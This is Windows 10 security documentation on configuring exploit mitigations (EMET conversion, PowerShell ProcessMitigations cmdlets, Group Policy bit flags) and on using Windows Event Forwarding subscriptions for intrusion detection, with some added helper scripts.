Code Integrity Restriction to restrict image loading: SetProcessMitigationPolicy function [ProcessSignaturePolicy]

Win32k System Call Disable Restriction to restrict ability to use NTUser and GDI: SetProcessMitigationPolicy function [ProcessSystemCallDisablePolicy]

High Entropy ASLR for up to 1TB of variance in memory allocations: UpdateProcThreadAttribute function [PROCESS_CREATION_MITIGATION_POLICY_HIGH_ENTROPY_ASLR_ALWAYS_ON]

Strict handle checks to raise immediate exception upon bad handle reference: UpdateProcThreadAttribute function [PROCESS_CREATION_MITIGATION_POLICY_STRICT_HANDLE_CHECKS_ALWAYS_ON]

Extension point disable to block the use of certain third-party extension points: UpdateProcThreadAttribute function [PROCESS_CREATION_MITIGATION_POLICY_EXTENSION_POINT_DISABLE_ALWAYS_ON]

Heap terminate on corruption to protect the system against a corrupted heap: UpdateProcThreadAttribute function [PROCESS_CREATION_MITIGATION_POLICY_HEAP_TERMINATE_ALWAYS_ON]

Understanding Windows 10 in relation to the Enhanced Mitigation Experience Toolkit
You might already be familiar with the Enhanced Mitigation Experience Toolkit (EMET), which has since 2009
offered a variety of exploit mitigations, and an interface for configuring those mitigations. You can use this section
to understand how EMET mitigations relate to those in Windows 10. Many of EMET’s mitigations have been built
into Windows 10, some with additional improvements. However, some EMET mitigations carry high performance
cost, or appear to be relatively ineffective against modern threats, and therefore have not been brought into
Windows 10.
Because many of EMET’s mitigations and security mechanisms already exist in Windows 10 and have been
improved, particularly those assessed to have high effectiveness at mitigating known bypasses, version 5.5x has
been announced as the final major version release for EMET (see Enhanced Mitigation Experience Toolkit).
The following table lists EMET features in relation to Windows 10 features.
Table 5 EMET features in relation to Windows 10 features
SPECIFIC EMET FEATURES / HOW THESE EMET FEATURES MAP TO WINDOWS 10 FEATURES

DEP; SEHOP; ASLR (Force ASLR, Bottom-up ASLR)
DEP, SEHOP and ASLR are included in Windows 10 as configurable features. See Table 2, earlier in this topic.
You can install the ProcessMitigations PowerShell module to convert your EMET settings for these features into policies that you can apply to Windows 10.

Load Library Check (LoadLib); Memory Protection Check (MemProt)
LoadLib and MemProt are supported in Windows 10, for all applications that are written to use these functions. See Table 4, earlier in this topic.

Null Page
Mitigations for this threat are built into Windows 10, as described in the “Memory reservations” item in Kernel pool protections, earlier in this topic.

Heap Spray; EAF; EAF+
Windows 10 does not include mitigations that map specifically to these EMET features because they have low impact in the current threat landscape, and do not significantly increase the difficulty of exploiting vulnerabilities. Microsoft remains committed to monitoring the security environment as new exploits appear and taking steps to harden the operating system against them.

Caller Check; Simulate Execution Flow; Stack Pivot; Deep Hooks (an ROP “Advanced Mitigation”); Anti Detours (an ROP “Advanced Mitigation”); Banned Functions (an ROP “Advanced Mitigation”)
Mitigated in Windows 10 with applications compiled with Control Flow Guard, as described in Control Flow Guard, earlier in this topic.

Converting an EMET XML settings file into Windows 10 mitigation policies
One of EMET’s strengths is that it allows you to import and export configuration settings for EMET mitigations as
an XML settings file for straightforward deployment. To generate mitigation policies for Windows 10 from an
EMET XML settings file, you can install the ProcessMitigations PowerShell module. In an elevated PowerShell
session, run this cmdlet:

Install-Module -Name ProcessMitigations

The Get-ProcessMitigation cmdlet gets the current mitigation settings from the registry or from a running process,
or it can save all settings to an XML file.
To get the current settings on all running instances of notepad.exe:

Get-ProcessMitigation -Name notepad.exe -RunningProcess

To get the current settings in the registry for notepad.exe:


Get-ProcessMitigation -Name notepad.exe

To get the current settings for the running process with pid 1304:

Get-ProcessMitigation -Id 1304

To get the all process mitigation settings from the registry and save them to the xml file settings.xml:

Get-ProcessMitigation -RegistryConfigFilePath settings.xml

The Set-ProcessMitigation cmdlet can enable and disable process mitigations or set them in bulk from an XML file.
To get the current process mitigation for "notepad.exe" from the registry and then enable MicrosoftSignedOnly and
disable MandatoryASLR:

Set-ProcessMitigation -Name Notepad.exe -Enable MicrosoftSignedOnly -Disable MandatoryASLR

To set the process mitigations from an XML file (which can be generated with Get-ProcessMitigation -RegistryConfigFilePath settings.xml):

Set-ProcessMitigation -PolicyFilePath settings.xml

To set the system default to be MicrosoftSignedOnly:

Set-ProcessMitigation -System -Enable MicrosoftSignedOnly

The ConvertTo-ProcessMitigationPolicy cmdlet converts mitigation policy file formats. The syntax is:

ConvertTo-ProcessMitigationPolicy -EMETFilePath <String> -OutputFilePath <String> [<CommonParameters>]

Examples:
Convert EMET settings to Windows 10 settings: You can run ConvertTo-ProcessMitigationPolicy and
provide an EMET XML settings file as input, which will generate a result file of Windows 10 mitigation
settings. For example:

ConvertTo-ProcessMitigationPolicy -EMETFilePath policy.xml -OutputFilePath result.xml

Audit and modify the converted settings (the output file): Additional cmdlets let you apply, enumerate,
enable, disable, and save settings in the output file. For example, this cmdlet enables SEHOP and disables
MandatoryASLR and DEPATL registry settings for Notepad:

Set-ProcessMitigation -Name notepad.exe -Enable SEHOP -Disable MandatoryASLR,DEPATL

Convert Attack surface reduction (ASR) settings to a Code Integrity policy file: If the input file
contains any settings for EMET’s Attack surface reduction (ASR) mitigation, the converter will also create a
Code Integrity policy file. In this case, you can complete the merging, auditing, and deployment process for
the Code Integrity policy, as described in Deploy Device Guard: deploy code integrity policies. This will
enable protections on Windows 10 equivalent to EMET’s ASR protections.
Convert Certificate Trust settings to enterprise certificate pinning rules: If you have an EMET
“Certificate Trust” XML file (pinning rules file), you can also use ConvertTo-ProcessMitigationPolicy to
convert the pinning rules file into an enterprise certificate pinning rules file. Then you can finish enabling
that file as described in Enterprise Certificate Pinning. For example:

ConvertTo-ProcessMitigationPolicy -EMETFilePath certtrustrules.xml -OutputFilePath enterprisecertpinningrules.xml
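The conversion and audit steps above, as an added example (the editor's script, not part of this topic or of the ProcessMitigations module): convert an EMET export, summarise what the converted policy enables for each executable before anything is written to the registry, apply it, and read one entry back. The paths are hypothetical, and the summary step assumes the converter emits the same MitigationPolicy/AppConfig XML that Set-ProcessMitigation -PolicyFilePath consumes (one child element per mitigation family with true/false attributes).

```powershell
# Added example: convert an EMET settings file, review the result, apply it, read it back.
# Assumptions: the ProcessMitigations module is installed and C:\EMET\policy.xml is an
# EMET export (both paths are hypothetical).
Import-Module ProcessMitigations

$emetFile   = 'C:\EMET\policy.xml'
$resultFile = 'C:\EMET\result.xml'

ConvertTo-ProcessMitigationPolicy -EMETFilePath $emetFile -OutputFilePath $resultFile

# Summarise the converted policy before touching the registry.
# Assumption: the output is the <MitigationPolicy><AppConfig Executable="..."> format that
# Set-ProcessMitigation -PolicyFilePath consumes, one child element per mitigation family
# (DEP, ASLR, SEHOP, ...) carrying true/false attributes.
function Get-ConvertedMitigationSummary {
    param([Parameter(Mandatory)][string]$PolicyPath)

    [xml]$policy = Get-Content -Path $PolicyPath -Raw
    foreach ($app in @($policy.MitigationPolicy.AppConfig)) {
        if (-not $app) { continue }
        $enabled = foreach ($family in $app.ChildNodes) {
            if ($family.NodeType -ne 'Element') { continue }
            foreach ($attr in $family.Attributes) {
                if ($attr.Value -eq 'true') { '{0}.{1}' -f $family.Name, $attr.Name }
            }
        }
        [pscustomobject]@{
            Executable = $app.Executable
            Enabled    = ($enabled -join ', ')
        }
    }
}

Get-ConvertedMitigationSummary -PolicyPath $resultFile | Format-Table -AutoSize

# Apply the whole converted policy (per-executable entries land in the registry).
Set-ProcessMitigation -PolicyFilePath $resultFile

# Anything the review showed as missing can be fixed in place with the mitigation
# names used in this topic; then read back what the registry now holds.
Set-ProcessMitigation -Name notepad.exe -Enable SEHOP -Disable DEPATL
Get-ProcessMitigation -Name notepad.exe
```

Review the summary output before the Set-ProcessMitigation step: an EMET file that force-enabled mitigations for a line-of-business app will carry those settings over, and a test lab is the place to find out whether the app tolerates them.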

EMET-related products
Microsoft Consulting Services (MCS) and Microsoft Support/Premier Field Engineering (PFE) offer a range of
options for EMET, support for EMET, and EMET-related reporting and auditing products such as the EMET
Enterprise Reporting Service (ERS). For any enterprise customers who use such products today or who are
interested in similar capabilities, we recommend evaluating Windows Defender Advanced Threat Protection (ATP).

Related topics
Security and Assurance in Windows Server 2016
Windows Defender Advanced Threat Protection (ATP) - resources
Windows Defender Advanced Threat Protection (ATP) - documentation
Exchange Online Advanced Threat Protection Service Description
Office 365 Advanced Threat Protection
Microsoft Malware Protection Center
Override Process Mitigation Options to help enforce app-related security policies
3/19/2019 • 3 minutes to read

Applies to:
Windows 10, version 1607
Windows Server 2016
Windows 10 includes Group Policy-configurable “Process Mitigation Options” that add advanced protections against
memory-based attacks, that is, attacks where malware manipulates memory to gain control of a system. For example,
malware might attempt to use buffer overruns to inject malicious executable code into memory, but Process Mitigation
Options can prevent the running of the malicious code.

IMPORTANT
We recommend trying these mitigations in a test lab before deploying to your organization, to determine if they interfere with
your organization’s required apps.

The Group Policy settings in this topic are related to three types of process mitigations. In Windows 10, all three types
are on by default for 64-bit applications, but by using the Group Policy settings described in this topic, you can
configure additional protections. The types of process mitigations are:
Data Execution Prevention (DEP) is a system-level memory protection feature that enables the operating
system to mark one or more pages of memory as non-executable, preventing code from being run from that
region of memory, to help prevent exploitation of buffer overruns. DEP helps prevent code from being run from
data pages such as the default heap, stacks, and memory pools. For more information, see Data Execution
Prevention.
Structured Exception Handling Overwrite Protection (SEHOP) is designed to block exploits that use the
Structured Exception Handler (SEH) overwrite technique. Because this protection mechanism is provided at run-
time, it helps to protect apps regardless of whether they have been compiled with the latest improvements. For
more information, see Structured Exception Handling Overwrite Protection.
Address Space Layout Randomization (ASLR) loads DLLs into random memory addresses at boot time to
mitigate against malware that’s designed to attack specific memory locations, where specific DLLs are expected
to be loaded. For more information, see Address Space Layout Randomization. To find additional ASLR
protections in the table below, look for IMAGES or ASLR.

The following procedure describes how to use Group Policy to override individual Process Mitigation Options
settings.
To modify Process Mitigation Options
1. Open your Group Policy editor and go to the Administrative Templates\System\Mitigation
Options\Process Mitigation Options setting.
2. Click Enabled, and then in the Options area, click Show to open the Show Contents box, where you’ll be able
to add your apps and the appropriate bit flag values, as shown in the Setting the bit field and Example sections of
this topic.
Important
For each app you want to include, you must include:
Value name. The app file name, including the extension. For example, iexplore.exe.
Value. A bit field with a series of bit flags in particular positions. Bits can be set to 0 (where the setting is
forced off), 1 (where the setting is forced on), or ? (where the setting retains the previous, existing value).
Note
Setting bit flags in positions not specified here to anything other than ? might cause undefined behavior.
Setting the bit field
The bit flags are read from right to left: the rightmost character of the value is bit 0, and each flag's
position is the bit index of its PROCESS_CREATION_MITIGATION_POLICY value. The flags are defined as:

FLAG  BIT LOCATION  SETTING  DETAILS

A  0  PROCESS_CREATION_MITIGATION_POLICY_DEP_ENABLE (0x00000001)  Turns on Data Execution Prevention (DEP)
for child processes.

B  1  PROCESS_CREATION_MITIGATION_POLICY_DEP_ATL_THUNK_ENABLE (0x00000002)  Turns on DEP-ATL thunk emulation
for child processes. DEP-ATL thunk emulation lets the system intercept non-executable (NX) faults that
originate from the Active Template Library (ATL) thunk layer, and then emulate and handle the instructions so
the process can continue to run.

C  2  PROCESS_CREATION_MITIGATION_POLICY_SEHOP_ENABLE (0x00000004)  Turns on Structured Exception Handler
Overwrite Protection (SEHOP) for child processes. SEHOP helps to block exploits that use the Structured
Exception Handler (SEH) overwrite technique.

D  8  PROCESS_CREATION_MITIGATION_POLICY_FORCE_RELOCATE_IMAGES_ALWAYS_ON (0x00000100)  Uses the force
Address Space Layout Randomization (ASLR) setting to act as though an image base collision happened at load
time, forcibly rebasing images that aren’t dynamic base compatible. Images without the base relocation section
won’t be loaded if relocations are required.

E  16  PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_ON (0x00010000)  Turns on the bottom-up
randomization policy, which includes stack randomization options and causes a random location to be used as
the lowest user address.

F  17  PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_OFF (0x00020000)  Turns off the bottom-up
randomization policy, which includes stack randomization options and causes a random location to be used as
the lowest user address.

The bit locations for E and F follow their hex values: 0x00010000 is bit 16 and 0x00020000 is bit 17, just
as 0x00000100 is bit 8 for D.

Example
If you want to turn on the PROCESS_CREATION_MITIGATION_POLICY_DEP_ENABLE (bit 0) and
PROCESS_CREATION_MITIGATION_POLICY_FORCE_RELOCATE_IMAGES_ALWAYS_ON (bit 8) settings, turn off the
PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_OFF (bit 17) setting, and leave everything
else as the default values, you’d want to type a value of ??????????????0????????1???????1 (32 characters,
counted from the right).
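Because the value is easy to get wrong by one position, here is an added example (the editor's code, not part of this topic) that builds the string for the Show Contents box from the PROCESS_CREATION_MITIGATION_POLICY hex constants, so the character position is always derived from the value, and decodes an existing string back into flag names. Only the constants listed in the table above are included; the function names are the editor's.

```powershell
# Added example: build and decode a Process Mitigation Options value. Each character
# position is derived from the PROCESS_CREATION_MITIGATION_POLICY_* hex constant, so the
# position and the constant cannot disagree.
$MitigationFlags = [ordered]@{
    DEP_ENABLE                      = 0x00000001
    DEP_ATL_THUNK_ENABLE            = 0x00000002
    SEHOP_ENABLE                    = 0x00000004
    FORCE_RELOCATE_IMAGES_ALWAYS_ON = 0x00000100
    BOTTOM_UP_ASLR_ALWAYS_ON        = 0x00010000
    BOTTOM_UP_ASLR_ALWAYS_OFF       = 0x00020000
}

# Bit index of a single-bit constant, e.g. 0x00010000 -> 16.
function Get-BitIndex([uint32]$Value) {
    $index = 0
    while ($Value -gt 1) { $Value = $Value -shr 1; $index++ }
    return $index
}

function Get-FlagValue([string]$Name) {
    if (-not $MitigationFlags.Contains($Name)) { throw "Unknown mitigation flag: $Name" }
    return [uint32]$MitigationFlags[$Name]
}

function New-MitigationOptionsValue {
    param([string[]]$ForceOn = @(), [string[]]$ForceOff = @())

    # Index i of $bits is bit i. Bits that are not named keep their existing value ('?'),
    # which is what the topic says to use for every unspecified position.
    $bits = [char[]]('?' * 32)
    foreach ($name in $ForceOn)  { $bits[(Get-BitIndex (Get-FlagValue $name))] = '1' }
    foreach ($name in $ForceOff) { $bits[(Get-BitIndex (Get-FlagValue $name))] = '0' }

    # The policy reads the string right to left, so bit 0 must be the last character.
    [array]::Reverse($bits)
    return -join $bits
}

# Reverse operation: which flags does an existing value force on or off?
function ConvertFrom-MitigationOptionsValue([string]$Value) {
    if ($Value.Length -ne 32) { throw "Expected a 32-character value, got $($Value.Length)" }
    $bits = [char[]]$Value
    [array]::Reverse($bits)            # index i = bit i again
    foreach ($entry in $MitigationFlags.GetEnumerator()) {
        $bit   = Get-BitIndex ([uint32]$entry.Value)
        $state = switch ($bits[$bit]) { '1' { 'forced on' } '0' { 'forced off' } default { $null } }
        if ($state) { [pscustomobject]@{ Flag = $entry.Key; Bit = $bit; State = $state } }
    }
}

# The Example from this topic: DEP on (bit 0), forced relocation on (bit 8),
# "bottom-up ASLR always off" turned off (bit 17).
$value = New-MitigationOptionsValue -ForceOn DEP_ENABLE, FORCE_RELOCATE_IMAGES_ALWAYS_ON `
                                    -ForceOff BOTTOM_UP_ASLR_ALWAYS_OFF
$value
ConvertFrom-MitigationOptionsValue $value | Format-Table -AutoSize
```

Running it reproduces the 32-character string given in the Example, and the decode step lists exactly the three forced bits; that string is what goes in the Value column next to the app's file name in the Show Contents box. A flag name that is not in the table throws rather than silently leaving a '?' in place.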
Use Windows Event Forwarding to help with intrusion detection
4/18/2019 • 25 minutes to read

Applies to
Windows 10
Windows Server
Learn about an approach to collect events from devices in your organization. This article talks about events in both
normal operations and when an intrusion is suspected.
Windows Event Forwarding (WEF) reads any operational or administrative event log on a device in your
organization and forwards the events you choose to a Windows Event Collector (WEC) server.
To accomplish this, two different subscriptions are published to client devices: the Baseline subscription
and the Suspect subscription. The Baseline subscription enrolls all devices in your organization, and the Suspect
subscription only includes devices that you have added. The Suspect subscription collects additional events
to help build context for system activity and can quickly be updated to accommodate new events and/or scenarios
as needed without impacting baseline operations.
This implementation helps differentiate where events are ultimately stored. Baseline events can be sent to devices
with online analytical capability, such as a Security Event Manager (SEM), while also being sent to a MapReduce
system, such as HDInsight or Hadoop, for long-term storage and deeper analysis. Events from the Suspect
subscription are sent directly to a MapReduce system because of their volume and lower signal-to-noise ratio;
they are largely used for host forensic analysis.
An SEM’s strength lies in inspecting and correlating events, generating alerts for known patterns, and alerting
security staff at machine speed.
A MapReduce system has a longer retention time (years versus months for an SEM), larger ingress capacity
(hundreds of terabytes per day), and the ability to perform more complex operations on the data, such as
statistical and trend analysis, pattern clustering analysis, or applying machine learning algorithms.
Here's an approximate scaling guide for WEF events:

EVENTS/SECOND RANGE DATA STORE

0 - 5,000 SQL or SEM

5,000 - 50,000 SEM

50,000+ Hadoop/HDInsight/Data Lake

Event generation on a device must be enabled either separately or as part of the GPO for the baseline WEF
implementation, including enabling of disabled event logs and setting channel permissions. For more info, see
Appendix C - Event channel settings (enable and channel access) methods. This is because WEF is a passive system
with regards to the event log. It cannot change the size of event log files, enable disabled event channels, change
channel permissions, or adjust a security audit policy. WEF only queries event channels for existing events.
Additionally, having event generation already occurring on a device allows for more complete event collection
building a complete history of system activity. Otherwise, you'll be limited to the speed of GPO and WEF
subscription refresh cycles to make changes to what is being generated on the device. On modern devices,
enabling additional event channels and expanding the size of event log files has not resulted in noticeable
performance differences.
For the minimum recommended audit policy and registry system ACL settings, see Appendix A - Minimum
recommended audit policy and Appendix B - Recommended minimum registry system ACL policy.

Note: These are only the minimum values needed to generate the events that the WEF subscriptions select.

From a WEF subscription management perspective, the event queries provided should be used in two separate
subscriptions for ease of maintenance; only machines meeting specific criteria would be allowed access to the
targeted subscription, and that access would be determined by an algorithm or an analyst’s direction. All devices
should have access to the Baseline subscription.
This means you would create two base subscriptions, each using its respective event query below:
Baseline WEF subscription. Events collected from all hosts; this includes some role-specific events, which will
only be emitted by those machines.
Targeted WEF subscription. Events collected from a limited set of hosts due to unusual activity and/or
heightened awareness for those systems.
Note that for the Targeted subscription the “read existing events” option should be set to true to allow
collection of existing events from systems. By default, WEF subscriptions only forward events generated after
the WEF subscription was received by the client.
In Appendix E – Annotated Baseline Subscription Event Query and Appendix F – Annotated Suspect Subscription
Event Query, the event query XML is included for creating WEF subscriptions. These are annotated for query
purpose and clarity. Individual <Query> elements can be removed or edited without affecting the rest of the query.
Common WEF questions
This section addresses common questions from IT pros and customers.
Will the user notice if their machine is enabled for WEF or if WEF encounters an error?
The short answer is: No.
The longer answer is: The Eventlog-forwardingPlugin/Operational event channel logs the success, warning,
and error events related to WEF subscriptions present on the device. Unless the user opens Event Viewer and
navigates to that channel, they will not notice WEF either through resource consumption or Graphical User
Interface pop-ups. Even if there is an issue with the WEF subscription, there is no user interaction or performance
degradation. All success, warning, and failure events are logged to this operational event channel.
Is WEF Push or Pull?
A WEF subscription can be configured to be push or pull, but not both. The simplest, most flexible IT deployment
with the greatest scalability can be achieved by using a push, or source initiated, subscription. WEF clients are
configured by using a GPO and the built-in forwarding client is activated. For pull, collector initiated, the
subscription on the WEC server is pre-configured with the names of the WEF Client devices from which events are
to be selected. Those clients also have to be configured ahead of time to allow the credentials used in the
subscription to access their event logs remotely (normally by adding the credential to the Event Log Readers
built-in local security group.) A useful scenario: closely monitoring a specific set of machines.
Will WEF work over VPN or RAS?
WEF handles VPN, RAS, and DirectAccess scenarios well and will reconnect and send any accumulated backlog of
events when the connection to the WEF Collector is re-established.
How is client progress tracked?
The WEC server maintains in its registry the bookmark information and last heartbeat time for each event source
for each WEF subscription. When an event source re-connects to a WEC server, the last bookmark position is sent
to the device to use as a starting point to resume forwarding events. If a WEF client has no events to send, the WEF
client will connect periodically to send a Heartbeat to the WEC server to indicate it is active. This heartbeat value
can be individually configured for each subscription.
Will WEF work in an IPv4, IPv6, or mixed IPv4/IPv6 environment?
Yes. WEF is transport agnostic and will work over IPv4 or IPv6.
Are WEF events encrypted? I see an HTTP/HTTPS option!
In a domain setting, the connection used to transmit WEF events is encrypted using Kerberos, by default (with
NTLM as a fallback option, which can be disabled by using a GPO). Only the WEF collector can decrypt the
connection. Additionally, the connection between WEF client and WEC server is mutually authenticated regardless
of authentication type (Kerberos or NTLM.) There are GPO options to force Authentication to use Kerberos Only.
This authentication and encryption is performed regardless if HTTP or HTTPS is selected.
The HTTPS option is available if certificate based authentication is used, in cases where the Kerberos based mutual
authentication is not an option. The SSL certificate and provisioned client certificates are used to provide mutual
authentication.
Do WEF Clients have a separate buffer for events?
The WEF client machine’s local event log is the buffer for WEF for when the connection to the WEC server is lost.
To increase the “buffer size”, increase the maximum file size of the specific event log file from which events are
being selected. For more info, see Appendix C – Event Channel Settings (enable and Channel Access) methods.
When the event log overwrites existing events (resulting in data loss if the device is not connected to the Event
Collector), there is no notification sent to the WEF collector that events are lost from the client. Neither is there an
indicator that there was a gap encountered in the event stream.
What format is used for forwarded events?
WEF has two modes for forwarded events. The default is “Rendered Text” which includes the textual description of
the event as you would see it in Event Viewer. This means that the event size is effectively doubled or tripled
depending on the size of the rendered description. The alternative mode is “Events” (also sometimes referred to as
“Binary” format) – which is just the event XML itself sent in binary XML format (as it would be written to the evtx
file.) This is very compact and can more than double the event volume a single WEC server can accommodate.
A subscription “testSubscription” can be configured to use the Events format through the WECUTIL utility:

Wecutil ss "testSubscription" /cf:Events

How frequently are WEF events delivered?


Event delivery options are part of the WEF subscription configuration parameters – There are three built-in
subscription delivery options: Normal, Minimize Bandwidth, and Minimize Latency. A fourth, catch-all called
“Custom” is available but cannot be selected or configured through the WEF UI by using Event Viewer. The
Custom delivery option must be selected and configured using the WECUTIL.EXE command-line application. All
subscription options define a maximum event count and maximum event age, if either limit is exceeded then the
accumulated events are sent to the event collector.
This table outlines the built-in delivery options:

EVENT DELIVERY OPTIMIZATION OPTIONS DESCRIPTION


Normal This option ensures reliable delivery of events and does not
attempt to conserve bandwidth. It is the appropriate choice
unless you need tighter control over bandwidth usage or need
forwarded events delivered as quickly as possible. It uses pull
delivery mode, batches 5 items at a time and sets a batch
timeout of 15 minutes.

Minimize bandwidth This option ensures that the use of network bandwidth for
event delivery is strictly controlled. It is an appropriate choice
if you want to limit the frequency of network connections
made to deliver events. It uses push delivery mode and sets a
batch timeout of 6 hours. In addition, it uses a heartbeat
interval of 6 hours.

Minimize latency This option ensures that events are delivered with minimal
delay. It is an appropriate choice if you are collecting alerts or
critical events. It uses push delivery mode and sets a batch
timeout of 30 seconds.

For more info about delivery options, see Configure Advanced Subscription Settings.
The primary difference is in the latency which events are sent from the client. If none of the built-in options meet
your requirements you can set Custom event delivery options for a given subscription from an elevated command
prompt:

@rem Custom mode is required before DeliveryMaxItems or DeliveryMaxLatencyTime can be set
Wecutil ss "SubscriptionNameGoesHere" /cm:Custom
@rem set DeliveryMaxItems to 1 event
Wecutil ss "SubscriptionNameGoesHere" /dmi:1
@rem set DeliveryMaxLatencyTime to 10 ms
Wecutil ss "SubscriptionNameGoesHere" /dmlt:10

How do I control which devices have access to a WEF Subscription?


For source initiated subscriptions: Each WEF subscription on a WEC server has its own ACL for machine accounts
or security groups containing machine accounts (not user accounts) that are explicitly allowed to participate in that
subscription or are explicitly denied access. This ACL applies to only a single WEF subscription (since there can be
multiple WEF subscriptions on a given WEC server), other WEF Subscriptions have their own separate ACL.
For collector initiated subscriptions: The subscription contains the list of machines from which the WEC server is to
collect events. This list is managed at the WEC server, and the credentials used for the subscription must have
access to read event logs from the WEF Clients – the credentials can be either the machine account or a domain
account.
Can a client communicate to multiple WEF Event Collectors?
Yes. If you desire a High-Availability environment, simply configure multiple WEC servers with the same
subscription configuration and publish both WEC Server URIs to WEF clients. WEF Clients will forward events
simultaneously to the configured subscriptions on the WEC servers, if they have the appropriate access.
What are the WEC server’s limitations?
There are three factors that limit the scalability of WEC servers. The general rule for a stable WEC server on
commodity hardware is “10k x 10k” – meaning, no more than 10,000 concurrently active WEF Clients per WEC
server and no more than 10,000 events/second average event volume.
Disk I/O. The WEC server does not process or validate the received event, but rather buffers the received event
and then logs it to a local event log file (EVTX file). The speed of logging to the EVTX file is limited by the disk
write speed. Isolating the EVTX file to its own array or using high speed disks can increase the number of events
per second that a single WEC server can receive.
Network Connections. While a WEF source does not maintain a permanent, persistent connection to the WEC
server, it does not immediately disconnect after sending its events. This means that the number of WEF sources
that can simultaneously connect to the WEC server is limited to the open TCP ports available on the WEC
server.
Registry size. For each unique device that connects to a WEF subscription, there is a registry key
(corresponding to the FQDN of the WEF Client) created to store bookmark and source heartbeat
information. If this is not pruned to remove inactive clients this set of registry keys can grow to an
unmanageable size over time.
When a subscription has >1000 WEF sources connect to it over its operational lifetime, also known as
lifetime WEF sources, Event Viewer can become unresponsive for a few minutes when selecting the
Subscriptions node in the left-navigation, but will function normally afterwards.
At >50,000 lifetime WEF sources, Event Viewer is no longer an option and wecutil.exe (included with
Windows) must be used to configure and manage subscriptions.
At >100,000 lifetime WEF sources, the registry will not be readable and the WEC server will likely have
to be rebuilt.

Subscription information
The following lists everything each subscription collects; the actual subscription XML is available in an Appendix.
These are separated into Baseline and Targeted. The intent is to subscribe all hosts to Baseline, and then enroll
(and remove) hosts on an as-needed basis in the Targeted subscription.
Baseline subscription
While this appears to be the largest subscription, it really is the lowest volume on a per-device basis. (Exceptions
should be allowed for unusual devices: a device performing complex developer-related tasks can be expected to
create an unusually high volume of process create and AppLocker events.) This subscription does not require
special configuration on client devices to enable event channels or modify channel permissions.
The subscription is essentially a collection of query statements applied to the Event Log. This means that it is
modular in nature and a given query statement can be removed or changed without impacting other query
statements in the subscription. Additionally, suppress statements, which filter out specific events, only apply
within their own query statement and not to the entire subscription.
Baseline subscription requirements
To gain the most value out of the baseline subscription, we recommend the following settings on the device, so
that the clients are already generating the required events to be forwarded off the system.
Apply a security audit policy that is a superset of the recommended minimum audit policy. For more info, see
Appendix A – Minimum recommended audit policy. This ensures that the security event log is generating the
required events.
Apply at least an Audit-Only AppLocker policy to devices.
If you are already allowing or blocking executables by using AppLocker, then this requirement is met.
AppLocker events contain extremely useful information, such as file hash and digital signature
information for executables and scripts.
Enable disabled event channels and set the minimum size for modern event files.
Currently, there is no Administrative Template for enabling channels or setting the maximum size of the modern
event files. This must be done by a GPO that applies the settings directly, as described in Appendix C – Event
Channel Settings (enable and Channel Access) methods.
The annotated baseline event query is in Appendix E – Annotated Baseline Subscription Event Query. The baseline
subscription collects:
Anti-malware events from Microsoft Antimalware or Windows Defender. This can be configured for any given
anti-malware product easily if it writes to the Windows event log.
Security event log Process Create events.
AppLocker Process Create events (EXE, script, packaged App installation and execution).
Registry modification events. For more info, see Appendix B – Recommended minimum Registry System ACL
Policy.
OS startup and shutdown
Startup events include operating system version, service pack level, QFE version, and boot mode.
Service install
Includes the service name, the image path, and who installed the service.
Certificate Authority audit events
This is only applicable on systems with the Certificate Authority role installed.
Logs certificate requests and responses.
User profile events
Use of a temporary profile or unable to create a user profile may indicate an intruder is interactively
logging into a device but not wanting to leave a persistent profile behind.
Service start failure
Failure codes are localized, so you have to check the message DLL for values.
Network share access events
Filter out the IPC$ and NETLOGON shares, which are expected and noisy.
System shutdown initiate requests
Find out what initiated the restart of a device.
User initiated interactive logoff event
Remote Desktop Services session connect, reconnect, or disconnect.
EMET events, if EMET is installed.
Event forwarding plugin events
For monitoring WEF subscription operations, particularly Partial Success events. This is useful for
diagnosing deployment issues.
Network share create and delete
Enables detection of unauthorized share creation. Note: all shares are re-created when the device
starts.
Logon sessions
Logon success for interactive sessions (local and Remote Interactive/Remote Desktop).
Logon success for services running as accounts other than the built-in ones (LocalSystem, LocalService,
NetworkService).
Logon success for batch sessions.
Logon session close, which are logoff events for non-network sessions.
Windows Error Reporting (Application crash events only)
This can help detect early signs of intruder not familiar with enterprise environment using targeted
malware.
Event log service events
Errors, start events, and stop events for the Windows Event Log service.
Event log cleared (including the Security Event Log)
This could indicate an intruder who is covering their tracks.
Special privileges assigned to new logon
This indicates that at the time of logon a user is either an Administrator or has the sufficient access to
make themselves Administrator.
Outbound Remote Desktop Services session attempts
Visibility into potential beachhead for intruder
System time changed
SMB Client (mapped drive connections)
Account credential validation
Local accounts or domain accounts on domain controllers
A user was added or removed from the local Administrators security group.
Crypto API private key accessed
Associated with signing objects using the locally stored private key.
Task Scheduler task creation and delete
Task Scheduler allows intruders to run code at specified times as LocalSystem.
Logon with explicit credentials
Detect credential use changes by intruders to access additional resources.
Smartcard card holder verification events
This detects when a smartcard is being used.
Suspect subscription
This adds some possible intruder-related activity to help analysts further refine their determinations about the
state of the device.
Logon session creation for network sessions
Enables time-series analysis of network graphs.
RADIUS and VPN events
Useful if you use a Microsoft IAS RADIUS/VPN implementation. It shows user-> IP address assignment
with remote IP address connecting to the enterprise.
Crypto API X509 object and build chain events
Detects known bad certificate, CA, or sub-CA
Detects unusual process use of CAPI
Groups assigned to local logon
Gives visibility to groups which enable account wide access
Allows better planning for remediation efforts
Excludes well known, built-in system accounts.
Logon session exit
Specific for network logon sessions.
Client DNS lookup events
Returns what process performed a DNS query and the results returned from the DNS server.
Process exit
Enables checking for processes terminating unexpectedly.
Local credential validation or logon with explicit credentials
Generated when the local SAM is authoritative for the account credentials being authenticated.
Noisy on domain controllers
On client devices this is only generated when local accounts log on.
Registry modification audit events
Only when a registry value is being created, modified, or deleted.
Wireless 802.1x authentication
Detect wireless connection with a peer MAC address
Windows PowerShell logging
Covers Windows PowerShell 2.0 and later and includes the Windows PowerShell 5.0 logging
improvements for in-memory attacks using Windows PowerShell.
Includes Windows PowerShell remoting logging
User Mode Driver Framework “Driver Loaded” event
Can possibly detect a USB device loading multiple device drivers. For example, a USB_STOR device
loading the keyboard or network driver.
